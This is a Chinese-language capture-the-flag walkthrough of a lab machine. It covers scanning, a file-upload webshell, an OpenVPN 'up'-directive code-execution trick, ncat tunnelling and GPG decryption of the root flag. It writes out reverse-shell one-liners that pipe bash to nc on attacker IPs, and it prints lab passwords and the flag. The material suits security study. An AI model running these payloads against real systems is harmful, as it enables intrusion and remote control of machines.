OpenVPN RCE + NC代理横向移动 + GPG解密攻击链分析<\/h1>

信息收集阶段<\/h2>

初始扫描<\/h3>
目标IP: 10.10.10.109<\/code><\/li>
扫描命令:
ip=<\/span>'10.10.10.109'<\/span>; itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span> 
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>; 
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>; 
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>; 
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>; 
<\/span><\/span>  else<\/span> 
<\/span><\/span>    echo -e "\e\31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>; 
<\/span><\/span>  fi<\/span>; 
<\/span><\/span>else<\/span> 
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>; 
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
发现服务<\/h3>

开放端口:

22\/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.4

SSH主机密钥:

RSA: 2048 a69d0f7d7375bba8940ab7e3fe1f24f4<\/li>
ECDSA: 256 2c7c34eb3aeb0403ac48285409743d27<\/li>
ED25519: 256 98425fad8722926d72e6666c82c10983<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
80\/tcp: Apache httpd 2.4.18 (Ubuntu)

页面内容: 提到了"Sparklays"<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
Web应用攻击<\/h2>
目录爆破<\/h3>
feroxbuster -u 'http:\/\/10.10.10.109\/sparklays'<\/span> -x php
<\/span><\/span><\/code><\/pre>发现路径: \/sparklays\/design\/changelogo.php<\/code><\/p>
文件上传漏洞利用<\/h3>
上传PHP webshell到changelogo.php<\/code>:<\/p>
<?<\/span>php<\/span> system<\/span>('rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2>&1|nc 10.10.16.27 443 >\/tmp\/f'<\/span>) ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>使用curl访问上传的webshell:<\/p>
curl -S http:\/\/10.10.10.109\/sparklays\/design\/uploads\/1.php5
<\/span><\/span><\/code><\/pre>获取初始凭据<\/h3>
在\/home\/dave\/Desktop\/<\/code>发现密码:<\/p>
password: Dav3therav3123
key>itscominghome
<\/code><\/pre>
横向移动<\/h2>
SSH动态端口转发<\/h3>
ssh -D 1090<\/span> dave@10.10.10.109
<\/span><\/span><\/code><\/pre>内网扫描<\/h3>
time for<\/span> i in $(<\/span>seq 1<\/span> 254)<\/span>; do<\/span> (<\/span>ping -c 1<\/span> 192.168.122.${<\/span>i}<\/span> | grep "bytes from"<\/span> &)<\/span>; done<\/span>
<\/span><\/span><\/code><\/pre>OpenVPN RCE漏洞利用<\/h3>
发现OpenVPN配置文件存在RCE漏洞，参考:

https:\/\/www.bleepingcomputer.com\/news\/security\/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why\/<\/p>
恶意OpenVPN配置:<\/p>
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "\/bin\/bash -c 'rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.122.1 10032 >\/tmp\/f'"
nobind
<\/code><\/pre>
获取SSH凭据<\/h3>
发现用户dave<\/code>的SSH密码:<\/p>
dav3gerous567
<\/code><\/pre>
权限提升与横向移动<\/h2>
历史记录分析<\/h3>
cat \/home\/alex\/.bash_history
<\/span><\/span><\/code><\/pre>日志分析<\/h3>
grep -rHa "192.168.5.2"<\/span> \/var\/log
<\/span><\/span><\/code><\/pre>端口扫描绕过<\/h3>
nmap 192.168.5.2 -Pn -f
<\/span><\/span>nmap 192.168.5.2 -Pn -f --source-port=<\/span>4444<\/span>
<\/span><\/span><\/code><\/pre>NC代理隧道搭建<\/h3>

使用NC连接目标:<\/li>
<\/ol>
nc 192.168.5.2 987<\/span> -p 53<\/span>
<\/span><\/span><\/code><\/pre>
设置本地监听端口:<\/li>
<\/ol>
SHELL=<\/span>\/bin\/sh script -q \/dev\/null
<\/span><\/span>\/usr\/bin\/ncat -l 1801<\/span> --sh-exec "ncat 192.168.5.2 987 -p 53"<\/span> &
<\/span><\/span><\/code><\/pre>
通过隧道SSH连接:<\/li>
<\/ol>
ssh dave@localhost -p 1801<\/span> -t 'bash'<\/span>
<\/span><\/span><\/code><\/pre>使用密码: dav3gerous567<\/code><\/p>
GPG解密获取root flag<\/h2>

发现加密的root flag:<\/li>
<\/ol>
cat root.txt.gpg
<\/span><\/span><\/code><\/pre>
使用GPG解密:<\/li>
<\/ol>
gpg -d root.gpg
<\/span><\/span><\/code><\/pre>使用密码: itscominghome<\/code><\/p>

解密后的root flag:<\/li>
<\/ol>
ca468370b91d1f5906e31093d9bfe819
<\/code><\/pre>
关键知识点总结<\/h2>


文件上传漏洞利用<\/strong>:<\/p>

通过修改文件扩展名(.php5)绕过过滤<\/li>
使用multipart\/form-data上传webshell<\/li>
<\/ul>
<\/li>

OpenVPN RCE<\/strong>:<\/p>

利用script-security 2<\/code>配置和up<\/code>指令执行任意命令<\/li>
通过反向shell建立连接<\/li>
<\/ul>
<\/li>

NC代理横向移动<\/strong>:<\/p>

使用ncat建立双向隧道<\/li>
通过本地端口转发绕过防火墙限制<\/li>
<\/ul>
<\/li>

GPG解密<\/strong>:<\/p>

需要获取密码短语才能解密文件<\/li>
密码可能隐藏在系统文件或历史记录中<\/li>
<\/ul>
<\/li>

权限提升技巧<\/strong>:<\/p>

分析用户历史记录和日志文件<\/li>
查找内网其他主机和服务<\/li>
使用非标准端口和协议绕过检测<\/li>
<\/ul>
<\/li>
<\/ol>